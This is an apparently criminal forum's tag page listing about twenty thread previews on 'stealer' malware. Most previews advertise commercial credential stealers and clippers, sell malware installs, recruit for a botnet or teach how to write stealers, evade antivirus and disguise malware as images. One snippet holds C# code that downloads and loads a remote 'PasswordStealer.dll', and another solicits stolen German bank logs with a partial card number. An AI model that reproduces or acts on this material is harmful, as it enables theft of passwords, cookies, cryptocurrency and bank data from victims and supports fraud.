stealer

  1. Lord777

    What is a stealer and how to work with it

    1. What is stealer? Stealer - software that steals the personal data of the person who launched stealer itself on their computer / laptop. 2. How is the stilling process going? Initially, you will have to take into account the fact that there are stealers that cannot be calculated due to...
  2. Lord777

    Carding training: working with a stealer.

    Working with a stealer from A to Z. We earn money on cryptocurrency. Review. The project itself and the opinion. Choosing a stealer Ideal option for the price/quality ratio - RedLine The price is from $ 100 per month and up to $ 500 for a perpetual license. If there is not so much money...
  3. Lord777

    Unofficial builds of Windows 10 that contain a stealer for stealing cryptocurrency are listed

    The stealer penetrates the EFI section and transfers the cryptocurrency to the addresses of intruders. Dr. Web specialists found a stealer in unlicensed builds of Windows 10, which hackers distributed on one of the torrent trackers. A malicious application called Trojan.Clipper.231 replaces...
  4. raccoonstealer

    Raccoon Stealer [c/c++, maas, loader]

    Raccoon Stealer. We steal, You deal! _____________________________________ Представляем результат нашей многомесячной работы, регулярных обнов, фиксов и улучшений! Мы стартанули в апреле 2019 на exploit, wwh, xss и др. За прошедшее время мы получили не мало хороших отзывов и постоянно...
  5. Amadeus_sup

    AMADEUS STEALER - стиллер нового поколения, лучший в своем сегменте

    Представляем вашему вниманию AMADEUS STEALER, предназначенный для сбора логов и удобной работы с ними. AMADEUS собирает максимально необходимую информацию с девайсов потенциальной жертвы. AMADEUS лёгок как в установке, так и в его использовании. При первой же установке весь процесс работы с ним...
  6. Teacher

    We write our own stealer + bypass anti-viruses

    Guide to writing my own stealer! Installing dependencies Before writing the styler itself, we need to install some libraries. This will simplify the writing of the code itself, of course you can write it all yourself, but it will take a lot of time. 1. The most important component of the...
  7. L

    Sell Installs for .exe and .dll

    Sell installs MIX ww, USA, EU, Asia, etc. (* .exe, * .dll)! The source of the installs is the PPI bundle (white soft + our smoke loader). Information about the exchange is not disseminated. From 10k to 20k installs are spilled per day. COST (per 1000 installs): 1. World (MIX): when ordering...
  8. J

    Partnership on Botnet

    Hello guys have botnet If youre good in spreading please dm fast we can cashout crypto+bank logs 50/50 Dm: https://t.me/AK47_009 Time waster blocked
  9. Kozakdru

    Merlynn clipper 2021 30$

    [EN]: https://pastebin.com/smz7GJGb [RU]: Открыт предзаказ на Clipper. https://dark.video/video/merlynn-clipper-btc-eth-xmr Clipper - вирусное программное обеспечение, предназначенное для того чтобы отслеживать буфер обмена и подменять чужие крипто-кошельки на ваши. Clipper подменяет: BTC...
  10. B

    How To Hide Virus/Stealer in a Picture

    Greetings to all readers! Today we will consider one of the simplest ways to disguise malware, and with the help of it, stealers, keyloggers and other nasty things are still masked. 1. Create a folder and drag our picture and virus there. 2. Go to iconvertcom and create an icon for our picture...
  11. P

    Telegram stealer in C #

    This material is provided for educational purposes only and was created as part of the study of information security. The author did not publish material for malicious purposes. If someone uses the information for personal gain, then the author is not responsible for any harm or damage caused...
  12. Hacker

    Create your own stealer in Python + server

    The answer is simple - if you send it directly to a telegram, then the bot token can be intercepted and so steal your logs. Therefore, we will make it so that our stealer first sends a log to our server, and then the server sends us a log to Telegram. Preparing hosting. We buy hosting. I...
  13. Hacker

    Installing Azorult Stealer

    I've seen a lot of distributions, but no installation guides. I decided to write, otherwise why is a stealer needed if 60% of people just stupidly cannot figure out what to do with it. In this thread I will write not only the installation of the stealer, but also the distribution (there will not...
  14. Hacker

    Writing a stealer sending data to a server (located in the Tor network)

    This article is a logical continuation of the last article I laid out, in which the .onion site was created and raised: All programs in this article will be written in the Go programming language. Now is the time to use our created site as a server for accepting requests and storing data. To...
  15. H

    masked and encrypted stealer

    HI, do anybody know where i can get a masked and encrypted stealer for a mobile phone?
  16. Kozakdru

    Jester Stealer 2021 99$

    Jester Stealer - it is a new multifunctional styler, unique in its kind. The best software for carders. A build that is connected to our panel in Tor, it is possible to agree to install the panel on the client's server. Collection in memory, safety, work with tor, affordable price, convenient...
  17. Hacker

    We write a stealer. How to get your hands on Chrome and Firefox passwords.

    The content of the article 1. What will the antivirus say? 2. Chrome 3. Firefox 4. Network Security Services (NSS) 5. Conclusion So, browsers based on Chrome or Firefox store usernames and passwords encrypted in a SQLite database. This DBMS is compact and distributed free of charge under a...
  18. Hacker

    Dynamic DLL loading (writing a 9kb stealer)

    We will use the System.Reflections namespace public static byte[] GetLibrary() { byte[] dll = new byte[0]; string url = "https://raw.githubusercontent.com/L1ghtM4n/DynamicStealer/main/DLL/PasswordStealer.dll"; using (var client = new WebClient()) { try { dll...
  19. P

    How to secretly copy cookies to your USB flash drive? Stealer in BAT file.

    So, the first and main thing that is required for this is a USB flash drive with data. Below is its content. As you can see, there are two folders and two files here - a batch file and a file for autorun. The file for autorun contains a command that says that the batch file will be opened at...
  20. K

    Selling German bank fulldata / logs.

    Hello, we are looking forward to buy EZ sparkasse bank account logs. The logs must include * Name of the bank * Username password * Phone number of the victim and address if possible... ACCOUNTS MUST HAVE ECHTZEIT BOX SELECTED! Here i drop some sample data: Kartennummer: '5171165145...

stealer

stealer

Share this tag

Top